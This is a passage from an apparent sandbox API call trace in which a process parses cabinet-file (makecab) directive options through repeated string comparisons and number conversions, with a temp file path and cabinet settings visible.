(_Str1="InfFooter1", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfFooter2", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfFooter3", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfFooter4", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfHeader", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfHeader1", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfHeader2", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfHeader3", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfHeader4", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfHeader5", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfHeader6", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="InfSectionOrder", _Str2="CabinetName1") returned 6 [0254.575] _strcmpi (_Str1="MaxCabinetSize", _Str2="CabinetName1") returned 10 [0254.575] _strcmpi (_Str1="MaxDiskFileCount", _Str2="CabinetName1") returned 10 [0254.575] _strcmpi (_Str1="MaxDiskSize", _Str2="CabinetName1") returned 10 [0254.575] _strcmpi (_Str1="MaxErrors", _Str2="CabinetName1") returned 10 [0254.575] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="CabinetName1") returned 15 [0254.575] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="CabinetName1") returned 15 [0254.575] _strcmpi (_Str1="ReservePerFolderSize", _Str2="CabinetName1") returned 15 [0254.575] _strcmpi (_Str1="RptFileName", _Str2="CabinetName1") returned 15 [0254.575] _strcmpi (_Str1="SourceDir", _Str2="CabinetName1") returned 16 [0254.575] _strcmpi (_Str1="UniqueFiles", _Str2="CabinetName1") returned 18 [0254.575] _strcmpi (_Str1="DiskDirectory1", _Str2="CabinetName1") returned 1 [0254.575] atoi (_Str="1") returned 1 [0254.575] _vsnprintf (in: _DstBuf=0x27e87fd500, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fd468 | out: _DstBuf="CabinetName1") returned 12 [0254.576] atoi (_Str="1") returned 1 [0254.576] _strcmpi (_Str1="Cabinet", _Str2="CabinetName1") returned -110 [0254.576] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="CabinetName1") returned -8 [0254.576] _strcmpi (_Str1="CabinetNameTemplate", _Str2="CabinetName1") returned 67 [0254.576] _strcmpi (_Str1="ChecksumWidth", _Str2="CabinetName1") returned 7 [0254.576] _strcmpi (_Str1="ClusterSize", _Str2="CabinetName1") returned 11 [0254.576] _strcmpi (_Str1="Compress", _Str2="CabinetName1") returned 14 [0254.576] _strcmpi (_Str1="LongSourceFileNames", _Str2="CabinetName1") returned 9 [0254.576] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="CabinetName1") returned 14 [0254.576] _strcmpi (_Str1="CompressionType", _Str2="CabinetName1") returned 14 [0254.576] _strcmpi (_Str1="CompressionLevel", _Str2="CabinetName1") returned 14 [0254.576] _strcmpi (_Str1="CompressionMemory", _Str2="CabinetName1") returned 14 [0254.576] _strcmpi (_Str1="DestinationDir", _Str2="CabinetName1") returned 1 [0254.576] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="CabinetName1") returned 1 [0254.576] _strcmpi (_Str1="DiskLabelTemplate", _Str2="CabinetName1") returned 1 [0254.576] _strcmpi (_Str1="DoNotCopyFiles", _Str2="CabinetName1") returned 1 [0254.576] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="CabinetName1") returned 3 [0254.576] _strcmpi (_Str1="FolderSizeThreshold", _Str2="CabinetName1") returned 3 [0254.576] _strcmpi (_Str1="GenerateInf", _Str2="CabinetName1") returned 4 [0254.576] _strcmpi (_Str1="InfCabinetHeader", _Str2="CabinetName1") returned 6 [0254.576] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="CabinetName1") returned 6 [0254.576] _strcmpi (_Str1="InfCommentString", _Str2="CabinetName1") returned 6 [0254.576] _strcmpi (_Str1="InfDateFormat", _Str2="CabinetName1") returned 6 [0254.576] _strcmpi (_Str1="InfDiskHeader", _Str2="CabinetName1") returned 6 [0254.576] _strcmpi (_Str1="InfDiskLineFormat", _Str2="CabinetName1") returned 6 [0254.576] _strcmpi (_Str1="InfFileHeader", _Str2="CabinetName1") returned 6 [0254.576] _strcmpi (_Str1="InfFileLineFormat", _Str2="CabinetName1") returned 6 [0254.576] _strcmpi (_Str1="InfFileName", _Str2="CabinetName1") returned 6 [0254.576] _strcmpi (_Str1="InfFooter", _Str2="CabinetName1") returned 6 [0254.576] _strcmpi (_Str1="InfFooter1", _Str2="CabinetName1") returned 6 [0254.576] _strcmpi (_Str1="InfFooter2", _Str2="CabinetName1") returned 6 [0254.576] _strcmpi (_Str1="InfFooter3", _Str2="CabinetName1") returned 6 [0254.576] _strcmpi (_Str1="InfFooter4", _Str2="CabinetName1") returned 6 [0254.577] _strcmpi (_Str1="InfHeader", _Str2="CabinetName1") returned 6 [0254.577] _strcmpi (_Str1="InfHeader1", _Str2="CabinetName1") returned 6 [0254.577] _strcmpi (_Str1="InfHeader2", _Str2="CabinetName1") returned 6 [0254.577] _strcmpi (_Str1="InfHeader3", _Str2="CabinetName1") returned 6 [0254.577] _strcmpi (_Str1="InfHeader4", _Str2="CabinetName1") returned 6 [0254.577] _strcmpi (_Str1="InfHeader5", _Str2="CabinetName1") returned 6 [0254.577] _strcmpi (_Str1="InfHeader6", _Str2="CabinetName1") returned 6 [0254.577] _strcmpi (_Str1="InfSectionOrder", _Str2="CabinetName1") returned 6 [0254.577] _strcmpi (_Str1="MaxCabinetSize", _Str2="CabinetName1") returned 10 [0254.577] _strcmpi (_Str1="MaxDiskFileCount", _Str2="CabinetName1") returned 10 [0254.577] _strcmpi (_Str1="MaxDiskSize", _Str2="CabinetName1") returned 10 [0254.577] _strcmpi (_Str1="MaxErrors", _Str2="CabinetName1") returned 10 [0254.577] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="CabinetName1") returned 15 [0254.577] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="CabinetName1") returned 15 [0254.577] _strcmpi (_Str1="ReservePerFolderSize", _Str2="CabinetName1") returned 15 [0254.577] _strcmpi (_Str1="RptFileName", _Str2="CabinetName1") returned 15 [0254.577] _strcmpi (_Str1="SourceDir", _Str2="CabinetName1") returned 16 [0254.577] _strcmpi (_Str1="UniqueFiles", _Str2="CabinetName1") returned 18 [0254.577] _strcmpi (_Str1="DiskDirectory1", _Str2="CabinetName1") returned 1 [0254.577] atoi (_Str="1") returned 1 [0254.577] _vsnprintf (in: _DstBuf=0x27e87fd290, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fd1f8 | out: _DstBuf="CabinetName1") returned 12 [0254.577] atoi (_Str="1") returned 1 [0254.577] _strcmpi (_Str1="CabinetName1", _Str2="MaxDiskSize") returned -10 [0254.577] _strcmpi (_Str1="CabinetName1", _Str2="GenerateInf") returned -4 [0254.577] strpbrk (_Str=".set DestinationDir=\"\"", _Control=" \x09") returned=" DestinationDir=\"\"" [0254.578] strspn (_Str=" DestinationDir=\"\"", _Control=" \x09") returned 0x1 [0254.578] strpbrk (_Str="DestinationDir=\"\"", _Control=" \x09") returned 0x0 [0254.578] strspn (_Str=".set DestinationDir=\"\"", _Control=" \x09") returned 0x0 [0254.578] strspn (_Str=".set DestinationDir=\"\"", _Control=" \x09") returned 0x0 [0254.578] strpbrk (_Str="set DestinationDir=\"\"", _Control=" \x09") returned=" DestinationDir=\"\"" [0254.578] _strcmpi (_Str1="Define", _Str2="set") returned -15 [0254.578] _strcmpi (_Str1="Delete", _Str2="set") returned -15 [0254.578] _strcmpi (_Str1="Dump", _Str2="set") returned -15 [0254.578] _strcmpi (_Str1="InfBegin", _Str2="set") returned -10 [0254.578] _strcmpi (_Str1="InfEnd", _Str2="set") returned -10 [0254.578] _strcmpi (_Str1="InfWrite", _Str2="set") returned -10 [0254.578] _strcmpi (_Str1="InfWriteCabinet", _Str2="set") returned -10 [0254.578] _strcmpi (_Str1="InfWriteDisk", _Str2="set") returned -10 [0254.578] _strcmpi (_Str1="New", _Str2="set") returned -5 [0254.578] _strcmpi (_Str1="Option", _Str2="set") returned -4 [0254.578] _strcmpi (_Str1="Set", _Str2="set") returned 0 [0254.578] strspn (_Str=" DestinationDir=\"\"", _Control=" \x09") returned 0x1 [0254.578] strpbrk (_Str="DestinationDir=\"\"", _Control="= \x09") returned="=\"\"" [0254.578] strspn (_Str="=\"\"", _Control=" \x09") returned 0x0 [0254.578] strspn (_Str="\"\"", _Control=" \x09") returned 0x0 [0254.578] strspn (_Str="", _Control=" \x09") returned 0x0 [0254.578] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin", _Str2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin") returned 0 [0254.578] _strcmpi (_Str1="", _Str2="360K") returned -51 [0254.578] atol (_Str="362496") returned 362496 [0254.578] atol (_Str="") returned 0 [0254.578] _strcmpi (_Str1="", _Str2="720K") returned -55 [0254.578] atol (_Str="730112") returned 730112 [0254.578] atol (_Str="") returned 0 [0254.578] _strcmpi (_Str1="", _Str2="1.2M") returned -49 [0254.578] atol (_Str="1213952") returned 1213952 [0254.578] atol (_Str="") returned 0 [0254.579] _strcmpi (_Str1="", _Str2="1.25M") returned -49 [0254.579] atol (_Str="1250304") returned 1250304 [0254.579] atol (_Str="") returned 0 [0254.579] _strcmpi (_Str1="", _Str2="1.44M") returned -49 [0254.579] atol (_Str="1457664") returned 1457664 [0254.579] atol (_Str="") returned 0 [0254.579] _strcmpi (_Str1="", _Str2="1.68M") returned -49 [0254.579] atol (_Str="1716224") returned 1716224 [0254.579] atol (_Str="") returned 0 [0254.579] _strcmpi (_Str1="", _Str2="DMF168") returned -100 [0254.579] atol (_Str="1716224") returned 1716224 [0254.579] atol (_Str="") returned 0 [0254.579] _strcmpi (_Str1="", _Str2="CDROM") returned -99 [0254.579] atol (_Str="681984000") returned 681984000 [0254.579] atol (_Str="") returned 0 [0254.579] _strcmpi (_Str1="Cabinet", _Str2="DestinationDir") returned -1 [0254.579] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DestinationDir") returned -1 [0254.579] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DestinationDir") returned -1 [0254.579] _strcmpi (_Str1="ChecksumWidth", _Str2="DestinationDir") returned -1 [0254.579] _strcmpi (_Str1="ClusterSize", _Str2="DestinationDir") returned -1 [0254.579] _strcmpi (_Str1="Compress", _Str2="DestinationDir") returned -1 [0254.579] _strcmpi (_Str1="LongSourceFileNames", _Str2="DestinationDir") returned 8 [0254.579] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DestinationDir") returned -1 [0254.579] _strcmpi (_Str1="CompressionType", _Str2="DestinationDir") returned -1 [0254.579] _strcmpi (_Str1="CompressionLevel", _Str2="DestinationDir") returned -1 [0254.579] _strcmpi (_Str1="CompressionMemory", _Str2="DestinationDir") returned -1 [0254.579] _strcmpi (_Str1="DestinationDir", _Str2="DestinationDir") returned 0 [0254.579] _strcmpi (_Str1="DestinationDir", _Str2="MaxDiskSize") returned -9 [0254.579] _strcmpi (_Str1="DestinationDir", _Str2="GenerateInf") returned -3 [0254.579] strpbrk (_Str="\"01D4756785E0F97F09\"", _Control=" \x09") returned 0x0 [0254.579] strspn (_Str="\"01D4756785E0F97F09\"", _Control=" \x09") returned 0x0 [0254.580] strspn (_Str="\"01D4756785E0F97F09\"", _Control=" \x09") returned 0x0 [0254.580] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin", _Str2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin") returned 0 [0254.580] _strcmpi (_Str1="Cabinet", _Str2="LongSourceFileNames") returned -9 [0254.580] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="LongSourceFileNames") returned -9 [0254.580] _strcmpi (_Str1="CabinetNameTemplate", _Str2="LongSourceFileNames") returned -9 [0254.580] _strcmpi (_Str1="ChecksumWidth", _Str2="LongSourceFileNames") returned -9 [0254.580] _strcmpi (_Str1="ClusterSize", _Str2="LongSourceFileNames") returned -9 [0254.580] _strcmpi (_Str1="Compress", _Str2="LongSourceFileNames") returned -9 [0254.580] _strcmpi (_Str1="LongSourceFileNames", _Str2="LongSourceFileNames") returned 0 [0254.580] atoi (_Str="0") returned 0 [0254.580] _strcmpi (_Str1="Cabinet", _Str2="GenerateInf") returned -4 [0254.580] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="GenerateInf") returned -4 [0254.580] _strcmpi (_Str1="CabinetNameTemplate", _Str2="GenerateInf") returned -4 [0254.580] _strcmpi (_Str1="ChecksumWidth", _Str2="GenerateInf") returned -4 [0254.580] _strcmpi (_Str1="ClusterSize", _Str2="GenerateInf") returned -4 [0254.580] _strcmpi (_Str1="Compress", _Str2="GenerateInf") returned -4 [0254.580] _strcmpi (_Str1="LongSourceFileNames", _Str2="GenerateInf") returned 5 [0254.580] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="GenerateInf") returned -4 [0254.580] _strcmpi (_Str1="CompressionType", _Str2="GenerateInf") returned -4 [0254.580] _strcmpi (_Str1="CompressionLevel", _Str2="GenerateInf") returned -4 [0254.580] _strcmpi (_Str1="CompressionMemory", _Str2="GenerateInf") returned -4 [0254.580] _strcmpi (_Str1="DestinationDir", _Str2="GenerateInf") returned -3 [0254.580] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="GenerateInf") returned -3 [0254.580] _strcmpi (_Str1="DiskLabelTemplate", _Str2="GenerateInf") returned -3 [0254.580] _strcmpi (_Str1="DoNotCopyFiles", _Str2="GenerateInf") returned -3 [0254.580] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="GenerateInf") returned -1 [0254.580] _strcmpi (_Str1="FolderSizeThreshold", _Str2="GenerateInf") returned -1 [0254.580] _strcmpi (_Str1="GenerateInf", _Str2="GenerateInf") returned 0 [0254.580] atoi (_Str="1") returned 1 [0254.580] _strcmpi (_Str1="Cabinet", _Str2="SourceDir") returned -16 [0254.580] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="SourceDir") returned -16 [0254.580] _strcmpi (_Str1="CabinetNameTemplate", _Str2="SourceDir") returned -16 [0254.580] _strcmpi (_Str1="ChecksumWidth", _Str2="SourceDir") returned -16 [0254.581] _strcmpi (_Str1="ClusterSize", _Str2="SourceDir") returned -16 [0254.581] _strcmpi (_Str1="Compress", _Str2="SourceDir") returned -16 [0254.581] _strcmpi (_Str1="LongSourceFileNames", _Str2="SourceDir") returned -7 [0254.581] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="SourceDir") returned -16 [0254.581] _strcmpi (_Str1="CompressionType", _Str2="SourceDir") returned -16 [0254.581] _strcmpi (_Str1="CompressionLevel", _Str2="SourceDir") returned -16 [0254.581] _strcmpi (_Str1="CompressionMemory", _Str2="SourceDir") returned -16 [0254.581] _strcmpi (_Str1="DestinationDir", _Str2="SourceDir") returned -15 [0254.581] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="SourceDir") returned -15 [0254.581] _strcmpi (_Str1="DiskLabelTemplate", _Str2="SourceDir") returned -15 [0254.581] _strcmpi (_Str1="DoNotCopyFiles", _Str2="SourceDir") returned -15 [0254.581] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="SourceDir") returned -13 [0254.581] _strcmpi (_Str1="FolderSizeThreshold", _Str2="SourceDir") returned -13 [0254.581] _strcmpi (_Str1="GenerateInf", _Str2="SourceDir") returned -12 [0254.581] _strcmpi (_Str1="InfCabinetHeader", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfCommentString", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfDateFormat", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfDiskHeader", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfDiskLineFormat", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfFileHeader", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfFileLineFormat", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfFileName", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfFooter", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfFooter1", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfFooter2", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfFooter3", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfFooter4", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfHeader", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfHeader1", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfHeader2", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfHeader3", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfHeader4", _Str2="SourceDir") returned -10 [0254.581] _strcmpi (_Str1="InfHeader5", _Str2="SourceDir") returned -10 [0254.582] _strcmpi (_Str1="InfHeader6", _Str2="SourceDir") returned -10 [0254.582] _strcmpi (_Str1="InfSectionOrder", _Str2="SourceDir") returned -10 [0254.582] _strcmpi (_Str1="MaxCabinetSize", _Str2="SourceDir") returned -6 [0254.582] _strcmpi (_Str1="MaxDiskFileCount", _Str2="SourceDir") returned -6 [0254.582] _strcmpi (_Str1="MaxDiskSize", _Str2="SourceDir") returned -6 [0254.582] _strcmpi (_Str1="MaxErrors", _Str2="SourceDir") returned -6 [0254.582] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="SourceDir") returned -1 [0254.582] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="SourceDir") returned -1 [0254.582] _strcmpi (_Str1="ReservePerFolderSize", _Str2="SourceDir") returned -1 [0254.582] _strcmpi (_Str1="RptFileName", _Str2="SourceDir") returned -1 [0254.582] _strcmpi (_Str1="SourceDir", _Str2="SourceDir") returned 0 [0254.582] _strcmpi (_Str1="Cabinet", _Str2="DestinationDir") returned -1 [0254.582] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DestinationDir") returned -1 [0254.582] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DestinationDir") returned -1 [0254.582] _strcmpi (_Str1="ChecksumWidth", _Str2="DestinationDir") returned -1 [0254.582] _strcmpi (_Str1="ClusterSize", _Str2="DestinationDir") returned -1 [0254.582] _strcmpi (_Str1="Compress", _Str2="DestinationDir") returned -1 [0254.582] _strcmpi (_Str1="LongSourceFileNames", _Str2="DestinationDir") returned 8 [0254.582] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DestinationDir") returned -1 [0254.582] _strcmpi (_Str1="CompressionType", _Str2="DestinationDir") returned -1 [0254.582] _strcmpi (_Str1="CompressionLevel", _Str2="DestinationDir") returned -1 [0254.582] _strcmpi (_Str1="CompressionMemory", _Str2="DestinationDir") returned -1 [0254.582] _strcmpi (_Str1="DestinationDir", _Str2="DestinationDir") returned 0 [0254.583] _vsnprintf (in: _DstBuf=0x27e8c1574c, _MaxCount=0x7ff, _Format="MaxDiskSize%d", _ArgList=0x27e87fb628 | out: _DstBuf="MaxDiskSize0") returned 12 [0254.583] _strcmpi (_Str1="Cabinet", _Str2="MaxDiskSize0") returned -10 [0254.583] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="MaxDiskSize0") returned -10 [0254.583] _strcmpi (_Str1="CabinetNameTemplate", _Str2="MaxDiskSize0") returned -10 [0254.583] _strcmpi (_Str1="ChecksumWidth", _Str2="MaxDiskSize0") returned -10 [0254.583] _strcmpi (_Str1="ClusterSize", _Str2="MaxDiskSize0") returned -10 [0254.583] _strcmpi (_Str1="Compress", _Str2="MaxDiskSize0") returned -10 [0254.583] _strcmpi (_Str1="LongSourceFileNames", _Str2="MaxDiskSize0") returned -1 [0254.583] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="MaxDiskSize0") returned -10 [0254.583] _strcmpi (_Str1="CompressionType", _Str2="MaxDiskSize0") returned -10 [0254.583] _strcmpi (_Str1="CompressionLevel", _Str2="MaxDiskSize0") returned -10 [0254.583] _strcmpi (_Str1="CompressionMemory", _Str2="MaxDiskSize0") returned -10 [0254.583] _strcmpi (_Str1="DestinationDir", _Str2="MaxDiskSize0") returned -9 [0254.583] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="MaxDiskSize0") returned -9 [0254.583] _strcmpi (_Str1="DiskLabelTemplate", _Str2="MaxDiskSize0") returned -9 [0254.583] _strcmpi (_Str1="DoNotCopyFiles", _Str2="MaxDiskSize0") returned -9 [0254.583] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="MaxDiskSize0") returned -7 [0254.583] _strcmpi (_Str1="FolderSizeThreshold", _Str2="MaxDiskSize0") returned -7 [0254.583] _strcmpi (_Str1="GenerateInf", _Str2="MaxDiskSize0") returned -6 [0254.583] _strcmpi (_Str1="InfCabinetHeader", _Str2="MaxDiskSize0") returned -4 [0254.583] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="MaxDiskSize0") returned -4 [0254.583] _strcmpi (_Str1="InfCommentString", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfDateFormat", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfDiskHeader", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfDiskLineFormat", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfFileHeader", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfFileLineFormat", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfFileName", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfFooter", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfFooter1", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfFooter2", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfFooter3", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfFooter4", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfHeader", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfHeader1", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfHeader2", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfHeader3", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfHeader4", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfHeader5", _Str2="MaxDiskSize0") returned -4 [0254.584] _strcmpi (_Str1="InfHeader6", _Str2="MaxDiskSize0") returned -4 [0254.780] _strcmpi (_Str1="InfSectionOrder", _Str2="MaxDiskSize0") returned -4 [0254.780] _strcmpi (_Str1="MaxCabinetSize", _Str2="MaxDiskSize0") returned -1 [0254.780] _strcmpi (_Str1="MaxDiskFileCount", _Str2="MaxDiskSize0") returned -13 [0254.780] _strcmpi (_Str1="MaxDiskSize", _Str2="MaxDiskSize0") returned -48 [0254.780] _strcmpi (_Str1="MaxErrors", _Str2="MaxDiskSize0") returned 1 [0254.780] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="MaxDiskSize0") returned 5 [0254.780] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="MaxDiskSize0") returned 5 [0254.780] _strcmpi (_Str1="ReservePerFolderSize", _Str2="MaxDiskSize0") returned 5 [0254.780] _strcmpi (_Str1="RptFileName", _Str2="MaxDiskSize0") returned 5 [0254.780] _strcmpi (_Str1="SourceDir", _Str2="MaxDiskSize0") returned 6 [0254.780] _strcmpi (_Str1="UniqueFiles", _Str2="MaxDiskSize0") returned 8 [0254.781] _strcmpi (_Str1="DiskDirectory1", _Str2="MaxDiskSize0") returned -9 [0254.781] _strcmpi (_Str1="CabinetName1", _Str2="MaxDiskSize0") returned -10 [0254.781] atoi (_Str="1") returned 1 [0254.781] _vsnprintf (in: _DstBuf=0x27e87fb480, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fb3e8 | out: _DstBuf="MaxDiskSize0") returned 12 [0254.781] atoi (_Str="1") returned 1 [0254.781] _strcmpi (_Str1="Cabinet", _Str2="MaxDiskSize") returned -10 [0254.781] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="MaxDiskSize") returned -10 [0254.781] _strcmpi (_Str1="CabinetNameTemplate", _Str2="MaxDiskSize") returned -10 [0254.781] _strcmpi (_Str1="ChecksumWidth", _Str2="MaxDiskSize") returned -10 [0254.781] _strcmpi (_Str1="ClusterSize", _Str2="MaxDiskSize") returned -10 [0254.781] _strcmpi (_Str1="Compress", _Str2="MaxDiskSize") returned -10 [0254.781] _strcmpi (_Str1="LongSourceFileNames", _Str2="MaxDiskSize") returned -1 [0254.781] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="MaxDiskSize") returned -10 [0254.781] _strcmpi (_Str1="CompressionType", _Str2="MaxDiskSize") returned -10 [0254.781] _strcmpi (_Str1="CompressionLevel", _Str2="MaxDiskSize") returned -10 [0254.781] _strcmpi (_Str1="CompressionMemory", _Str2="MaxDiskSize") returned -10 [0254.781] _strcmpi (_Str1="DestinationDir", _Str2="MaxDiskSize") returned -9 [0254.781] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="MaxDiskSize") returned -9 [0254.781] _strcmpi (_Str1="DiskLabelTemplate", _Str2="MaxDiskSize") returned -9 [0254.781] _strcmpi (_Str1="DoNotCopyFiles", _Str2="MaxDiskSize") returned -9 [0254.781] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="MaxDiskSize") returned -7 [0254.781] _strcmpi (_Str1="FolderSizeThreshold", _Str2="MaxDiskSize") returned -7 [0254.781] _strcmpi (_Str1="GenerateInf", _Str2="MaxDiskSize") returned -6 [0254.781] _strcmpi (_Str1="InfCabinetHeader", _Str2="MaxDiskSize") returned -4 [0254.781] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="MaxDiskSize") returned -4 [0254.781] _strcmpi (_Str1="InfCommentString", _Str2="MaxDiskSize") returned -4 [0254.781] _strcmpi (_Str1="InfDateFormat", _Str2="MaxDiskSize") returned -4 [0254.781] _strcmpi (_Str1="InfDiskHeader", _Str2="MaxDiskSize") returned -4 [0254.781] _strcmpi (_Str1="InfDiskLineFormat", _Str2="MaxDiskSize") returned -4 [0254.781] _strcmpi (_Str1="InfFileHeader", _Str2="MaxDiskSize") returned -4 [0254.781] _strcmpi (_Str1="InfFileLineFormat", _Str2="MaxDiskSize") returned -4 [0254.781] _strcmpi (_Str1="InfFileName", _Str2="MaxDiskSize") returned -4 [0254.782] _strcmpi (_Str1="InfFooter", _Str2="MaxDiskSize") returned -4 [0254.782] _strcmpi (_Str1="InfFooter1", _Str2="MaxDiskSize") returned -4 [0254.782] _strcmpi (_Str1="InfFooter2", _Str2="MaxDiskSize") returned -4 [0254.782] _strcmpi (_Str1="InfFooter3", _Str2="MaxDiskSize") returned -4 [0254.782] _strcmpi (_Str1="InfFooter4", _Str2="MaxDiskSize") returned -4 [0254.782] _strcmpi (_Str1="InfHeader", _Str2="MaxDiskSize") returned -4 [0254.782] _strcmpi (_Str1="InfHeader1", _Str2="MaxDiskSize") returned -4 [0254.782] _strcmpi (_Str1="InfHeader2", _Str2="MaxDiskSize") returned -4 [0254.782] _strcmpi (_Str1="InfHeader3", _Str2="MaxDiskSize") returned -4 [0254.782] _strcmpi (_Str1="InfHeader4", _Str2="MaxDiskSize") returned -4 [0254.782] _strcmpi (_Str1="InfHeader5", _Str2="MaxDiskSize") returned -4 [0254.782] _strcmpi (_Str1="InfHeader6", _Str2="MaxDiskSize") returned -4 [0254.782] _strcmpi (_Str1="InfSectionOrder", _Str2="MaxDiskSize") returned -4 [0254.782] _strcmpi (_Str1="MaxCabinetSize", _Str2="MaxDiskSize") returned -1 [0254.782] _strcmpi (_Str1="MaxDiskFileCount", _Str2="MaxDiskSize") returned -13 [0254.782] _strcmpi (_Str1="MaxDiskSize", _Str2="MaxDiskSize") returned 0 [0254.782] atol (_Str="0") returned 0 [0254.782] _strcmpi (_Str1="Cabinet", _Str2="ClusterSize") returned -11 [0254.782] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="ClusterSize") returned -11 [0254.782] _strcmpi (_Str1="CabinetNameTemplate", _Str2="ClusterSize") returned -11 [0254.782] _strcmpi (_Str1="ChecksumWidth", _Str2="ClusterSize") returned -4 [0254.782] _strcmpi (_Str1="ClusterSize", _Str2="ClusterSize") returned 0 [0254.782] atol (_Str="512") returned 512 [0254.782] _stat (_FileName="01D4756785E0F97F09", _Stat=0x27e87fb7b0) returned 0 [0254.782] _strcmpi (_Str1="Cabinet", _Str2="UniqueFiles") returned -18 [0254.782] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="UniqueFiles") returned -18 [0254.782] _strcmpi (_Str1="CabinetNameTemplate", _Str2="UniqueFiles") returned -18 [0254.782] _strcmpi (_Str1="ChecksumWidth", _Str2="UniqueFiles") returned -18 [0254.782] _strcmpi (_Str1="ClusterSize", _Str2="UniqueFiles") returned -18 [0254.782] _strcmpi (_Str1="Compress", _Str2="UniqueFiles") returned -18 [0254.783] _strcmpi (_Str1="LongSourceFileNames", _Str2="UniqueFiles") 